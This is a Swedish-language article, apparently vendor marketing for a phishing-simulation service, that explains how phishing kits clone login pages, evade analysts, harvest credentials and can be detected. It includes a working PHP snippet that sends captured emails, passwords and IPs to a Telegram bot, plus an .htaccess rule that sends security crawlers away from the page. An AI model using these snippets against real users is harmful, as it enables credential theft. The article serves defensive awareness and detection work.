Anatomin hos ett modernt nätfiskekit
Ett ”nätfiskekit” är den paketerade, återanvändbara kodbas som angripare rullar ut för att klona en inloggningssida, skörda uppgifter och exfiltrera dem. Att förstå hur dessa kit är byggda — och hur de gömmer sig — gör det mycket lättare att upptäcka kampanjer tidigt och att bygga övertygande försvarssimuleringar.
Vad som ingår i ett kit
Ett typiskt kit är ett ZIP-arkiv som släpps på en kapad värd eller billig hosting. Strukturen är anmärkningsvärt konstant:
kit/
├── index.php # den klonade landningssidan
├── login.php # formulärhanterare: fångar + vidarebefordrar uppgifter
├── assets/ # exakta kopior av CSS, JS, loggor, typsnitt
├── config.php # exfiltreringsmål (e-post, Telegram-bot, fjärr-URL)
├── antibots.php # blocklistor för crawlrar, sandlådor, forskare
└── .htaccess # omskrivningar, geo-/IP-filtrering, hotlink-skydd
Moderna kit säljs allt oftare ”som tjänst” (PhaaS — Phishing-as-a-Service), komplett med prenumerationspaneler, uppdateringar och support.
Klonen
Landningssidan är oftast en byte-för-byte-kopia av en riktig inloggningsskärm, tagen med en sidkopierare eller en headless-webbläsare. Två tecken är vanliga:
- Absoluta resurs-URL:er som fortfarande pekar mot det legitima CDN:et (så att sidan laddar riktiga loggor medan formuläret postar till angriparen).
- Ett
<form>varsactionpekar mot en lokal PHP-hanterare i stället för varumärkets riktiga endpoint.
Avancerade kit proxyar den riktiga sajten i realtid (en adversary-in-the-middle-uppställning med verktyg som Evilginx), relärar offrets inmatning till den äkta servern och stjäl den resulterande sessionskakan — vilket besegrar de flesta MFA.
Anti-analyslager
Komponenten antibots är det som håller ett kit vid liv. Den filtrerar besökare innan nätfiskesidan serveras:
- User-agent- och ASN-filtrering — blockerar kända crawlrar och IP-intervallen hos Google, Microsoft, säkerhetsleverantörer och molnsandlådor.
- Referer- och geokontroller — serverar bara sidan till mål från det förväntade landet och skickar alla andra till den legitima sajten.
- Hastighetsbegränsning och engångslänkar — en token i URL:en som bränns efter ett enda besök, så att ett vidarebefordrat exemplar visar ett ofarligt 404.
# utdrag ur .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]
Därför var en URL som för en SOC-analytiker ”ser död ut” fullt levande för offret några minuter tidigare.
Fångst och exfiltrering av uppgifter
Hanteraren validerar precis så mycket att det ser äkta ut och skickar sedan iväg datan. Exfiltreringskanaler, ungefär efter popularitet:
- SMTP / mail() till en hårdkodad brevlåda.
- Telegram Bot-API — ett
sendMessage-anrop till en bot-token, billigt och motståndskraftigt. - POST till en C2-URL eller en Discord-webhook.
- Lokal loggfil som operatören hämtar senare.
$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");
Lägg märke till den sista omdirigeringen: efter den ”misslyckade inloggningen” hamnar offret på den riktiga sajten, antar ett skrivfel, loggar in med framgång och anar ingenting.
Hosting och leverans
Kit föredrar engångsinfrastruktur: kapade WordPress-sajter, öppna omdirigeringar på betrodda domäner, nyregistrerade snarlika domäner och allt oftare legitima tjänster (Cloudflare Workers, IPFS, SharePoint, Google Docs) för att låna deras rykte. Leveransen parar kitet med ett bete — en faktura, en MFA-”omverifiering”, en avisering om delat dokument.
Försvarsdetektion
Signaler värda att jaga:
- Nyregistrerade domäner som liknar ert varumärke (bevaka CT-loggar och typosquats).
- Favicon- och DOM-hashning — kit återanvänder exakt de klonade varumärkets resurser.
- Utgående Telegram- / webhook-anrop från webbvärdar som inte har någon anledning att göra dem.
- Inskickade uppgifter till oväntade origins i webbläsartelemetrin.
- DMARC-aggregatrapporter som avslöjar förfalskningsförsök mot er domän.
Den obekväma sanningen: ett välbyggt AiTM-kit besegrar MFA via sms och app genom att stjäla sessionstoken. Nätfiskeresistenta metoder — FIDO2 / passkeys — är den varaktiga lösningen.
Så hjälper GottaPhish
Moderna nätfiskekit gör vapen av exakta kloner och AiTM-sessionsstöld som till och med besegrar MFA via sms och app. GottaPhish och dess expertteam hjälper er att möta just det hotet: säkra, fullt granskade simuleringar som speglar riktiga kit — tokeniserade länkar, flöden för uppgiftsinfångning, AiTM-scenarier — med instrumentpaneler som visar vilka beten som fastnar och var MFA håller. Våra experter hjälper till med uppsättningen, utformar scenarier som återskapar dagens PhaaS-hantverk och hjälper er tolka resultaten som riktad utbildning och som konkreta signaler för detektionsteknik åt ert SOC.
